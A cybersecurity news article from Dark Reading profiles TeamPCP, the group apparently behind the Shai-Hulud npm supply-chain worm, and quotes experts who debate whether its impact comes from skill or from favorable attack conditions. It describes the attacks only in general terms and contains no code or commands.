The Hackers Behind Shai-Hulud: Lucky or Skilled?

APPLICATION SECURITY VULNERABILITIES & THREATS CYBERSECURITY OPERATIONS DATA PRIVACY NEWS The Hackers Behind Shai-Hulud: Lucky or Skilled? TeamPCP, the hackers behind the Shai-Hulud worm, has done significant damage to the open source ecosystem. But it's not necessarily due to skill alone. Alexander Culafi,Senior News Writer,Dark Reading May 26, 2026 5 Min Read SOURCE: OLEKSANDR PEREPELYTSIA VIA ALAMY STOCK PHOTO TeamPCP has made a name for itself as a scourge of the open source community following Shai-Hulud, but the group's attack history is less "sophisticated threat actor" and more "right place, right time" luck. A financially motivated threat actor, TeamPCP formally emerged in late 2025, making a name exploiting the React2Shell vulnerability as well as targeting misconfigured Docker APIs and Next.js. As researchers from Flare recently noted, the group would historically use opportunistic compromises to conduct ransomware, steal data to turn around and sell, and mine cryptocurrency.  The group's rise in notoriety this year came alongside its increasing focus on software supply chain compromises. Starting last summer, the group's Shai-Hulud worm ravaged the open source development ecosystem with its capacity to self-replicate and then poison developers downstream. If developers downloaded an open source node package manager (npm) component poisoned with Shai-Hulud, the worm would go on to infect any of the components that those developers contribute, uploading malicious updates to these otherwise legitimate components.  Related:GitHub Confirms Breach, 4K Internal Repos Stolen TeamPCP is widely believed to be one of the, if not the, primary threat actor behind the Shai-Hulud attacks.  TeamPCP Rattles the Software Ecosystem TeamPCP followed the initial Shai-Hulud with waves of successor attacks, including malware like GlassWorm, before ultimately releasing open source code for Shai-Hulud earlier this month. Researchers speculated that the threat actor did this as a way to scale Shai-Hulud's potential (as TeamPCP's command-and-control infrastructure was tied to the open source code), overwhelm defenders, and advertise an affiliate program the group had just launched.  And most recently, TeamPCP took credit for a compromise against GitHub, where an employee downloaded a poisoned VS Code extension that resulted in the theft of approximately 4,000 repositories of private code. Ilkka Turunen, field chief technical officer at Sonatype, tells Dark Reading that this latest incident is a reminder that developers are now "permanent targets" in software supply chain attacks.  "TeamPCP has shown how a motivated attacker can move through the tools developers trust every day — open source packages, extensions, accounts, and credentials — rather than trying to break in through the front door," Turunen says. One of the more notable aspects about TeamPCP is that it threw such an aggressive wrench into the open source ecosystem despite being only a few months old as a group and not necessarily the biggest threat actor out there.  Related:'Claw Chain' Vulnerabilities Threaten OpenClaw Deployments That said, its formal "age" may be misleading, as some researchers date TeamPCP activity to 2024, and threat actors don't necessarily start their cybercrime careers with the forming of a new group. Rather, the individuals that make up a cybercrime outfit may carry multiple affiliations, and core members may jump from group to group as one threat brand stops being effective (such as via law enforcement compromise or reputational loss).  TeamPCP's Cybercrime Success: Luck or Sophistication? Kevin Tian, CEO and co-founder of Doppel, tells Dark Reading that the threat actor didn't just get lucky. Rather, he says, TeamPCP understands how to exploit modern trust relationships inside software development environments.  "What stands out is less raw technical sophistication and more operational effectiveness," Tian explains. "TeamPCP appears highly capable of combining social engineering, trusted-platform abuse, and AI-assisted reconnaissance to move faster than traditional security defenses were designed to handle. They're proving attackers no longer need advanced zero-days when they can compromise trusted identities, trusted tools, and trusted workflows instead." Related:Shai-Hulud Worm Clones Spread After Code Release The CEO calls this part of a larger trend among cybercriminals who are choosing to target user trust (such as the idea that an open source component with millions of downloads won't be poisoned) rather than infrastructure directly. Elements of this trend can be seen elsewhere, such as in ClickFix attacks (which exploit a user's trust in software prompts), and an increasing sophistication in social engineering attacks.  Melissa Bischoping, senior director of security and product design research at Tanium, meanwhile says TeamPCP's rise isn't necessarily a question of sophistication or luck, but rather something that speaks to the realities of developer-focused supply chain attacks.  “Supply chain attacks on developer tooling have such favorable mechanics for the attacker that capable crews can score outsized impact, and that's most of what' s going on here," she tells Dark Reading. "The Mini Shai-Hulud campaigns are among the first worms we've seen actually weaponize SLSA [Supply-Chain Levels for Software Artifacts, an OpenSSF security framework used to prevent tampering with software builds] provenance attestation, and that shows technical depth and creativity, but I don't think they rise to the level of truly sophisticated overall. The rest of the operational pattern reads as mid-tier cybercrime with a good eye for targets and a great marketing strategy." In this way, TeamPCP is reminiscent of DragonForce, a newer ransomware-as-a-service (RaaS) group that gained prominence less because it was particularly sophisticated and more because it effectively marketed itself. DragonForce is a fairly prolific group best known for its white-labeling service, in which would-be cybercriminals can use their own branding on top of DragonForce infrastructure. Charlie Eriksen, security researcher at Aikido Security, notes that TeamPCP is heavily inspired by other threat actors and heavily leans on AI in building its payloads. Similar to Bischoping's comments, Erikson observes that the gang's tactics don't exactly require sophistication. "They don't really need to be sophisticated though, because once you have a publishing credential for a popular extension you've got a direct push channel into every machine running it," he explains. "They figured out early that open source developer tooling was a soft target, and they've just been hitting it consistently since." About the Author Alexander Culafi Senior News Writer, Dark Reading Alex is an award-winning writer, journalist, and podcast host based in Boston. After cutting his teeth writing for independent gaming publications as a teenager, he graduated from Emerson College in 2016 with a Bachelor of Science in journalism. He has previously been published on VentureFizz, Search Security, Nintendo World Report, and elsewhere.  At Dark Reading, he covers a variety of cybersecurity topics, including the cybercrime ecosystem, open source security, and the intersection between AI and threat actors. In his spare time, Alex hosts the weekly Nintendo podcast, "Talk Nintendo Podcast," and works on personal writing projects, including two previously self-published science fiction novels. He has received numerous awards, including TechTarget's Writer of the Year in 2022 as well as more than 10 Azbee awards for his reporting between 2022 and today.  Want more Dark Reading stories in your Google search results? ADD US NOW More Insights Industry Reports How Organizations Are Managing Incident Response How Enterprises Are Developing Secure Applications Inside RSAC 2026: security leaders reveal the risks redefining your defense strategy Essential News & Insights from Black Hat USA 2025 How Enterprises Are Harnessing Emerging Technologies in Cybersecurity Access More Research Webinars Build vs. Buy: The Hidden Cost of Building Your Own AI Security Stack Defending in the Shadow Era: When the CVE Feed Goes Dark Building SecOps That Make the Most of Every Dollar AI-Powered Cybersecurity for Resource-Constrained Organizations AI-Powered Credential Security: Intelligence Without Exposure More Webinars You May Also Like APPLICATION SECURITY Supply Chain Attack Secretly Installs OpenClaw for Cline Users by Rob Wright FEB 19, 2026 APPLICATION SECURITY Chinese Hackers Hijack Notepad++ Updates for 6 Months by Jai Vijayan, Contributing Writer FEB 02, 2026 APPLICATION SECURITY Trump Administration Rescinds Biden-Era Software Guidance by Alexander Culafi JAN 29, 2026 APPLICATION SECURITY Microsoft Fixes Exploited Zero Day in Light Patch Tuesday by Jai Vijayan, Contributing Writer DEC 09, 2025 Editor's Choice THREAT INTELLIGENCE From Stuxnet to ChatGPT: 20 News Events That Shaped Cyber byDark Reading Editorial Team MAY 6, 2026 31 MIN READ CYBER RISK Physical Cargo Theft Gets a Boost From Cybercriminals byRobert Lemos MAY 4, 2026 5 MIN READ CYBER RISK NSA Chief During Snowden Affair Shares Regrets, Reflections 13 Years Later byDark Reading Editorial Team APR 28, 2026 Want more Dark Reading stories in your Google search results? Keep up with the latest cybersecurity threats, newly discovered vulnerabilities, data breach information, and emerging trends. Delivered daily or weekly right to your email inbox. SUBSCRIBE LOADING... RSAC 2026: key news & insights At RSAC 2026, Dark Reading captured critical intelligence on AI, new attack methods, geopolitics, and much more Get Your Recap Webinars Build vs. Buy: The Hidden Cost of Building Your Own AI Security Stack THURS, JUNE 25, 2026, AT 1PM EST Defending in the Shadow Era: When the CVE Feed Goes Dark TUES, JUNE 16, 2026 AT 1PM EST Building SecOps That Make the Most of Every Dollar THURS, JULY 9, 2026 AT 1PM EST AI-Powered Credential Security: Intelligence Without Exposure WED, JUNE 17, 2026, AT 1PM EST AI-Powered Cybersecurity for Resource-Constrained Organizations THURS, JUNE 18, 2026, AT 1PM EST More Webinars BLACK HAT USA | MANDALAY BAY, LAS VEGAS The premier cybersecurity event of the year returns to Mandalay Bay with a re‑engineered, six‑day program built to ignite innovation, push boundaries, and bring the global security community together like never before. Use code: DARKREADING to save $200 on a Briefings pass or $100 on a Business pass. GET YOUR PASS